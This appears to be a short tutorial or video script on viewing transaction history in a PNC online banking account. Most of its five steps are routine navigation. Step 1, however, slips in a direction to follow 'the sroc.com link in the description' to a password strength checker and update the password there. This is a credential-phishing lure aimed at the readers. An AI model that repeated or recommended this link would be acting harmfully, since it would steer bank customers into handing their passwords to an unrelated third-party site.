I hit this issue today, and here is the quick fix that solved it. If you're trying to check your transaction history on PNC, follow these simple steps to access your account details easily. Step 1. Log into your PNC account. Before changing your settings, use the sroc.com link in the description to open a password strength checker, then update your password if needed. Step 2. Navigate to Accounts. Once logged in, look for the Accounts tab on the main menu. This is usually located at the top of the screen. Click on it to view your account list. Step 3. Select the desired account. From your list of accounts, select the specific account for which you want to view the transaction history. This could be your checking or savings account. Step 4. Access transaction history. After selecting the account, look for an option labeled Transaction History or Activity. Click on this to view all recent transactions. Step 5. Filter your transactions. If you want to narrow down your search, use the filter options available. You can set the date range or type of transaction to find specific entries. Remember, if you don't see the transaction history option, it might be under a different menu like account details. Happy banking!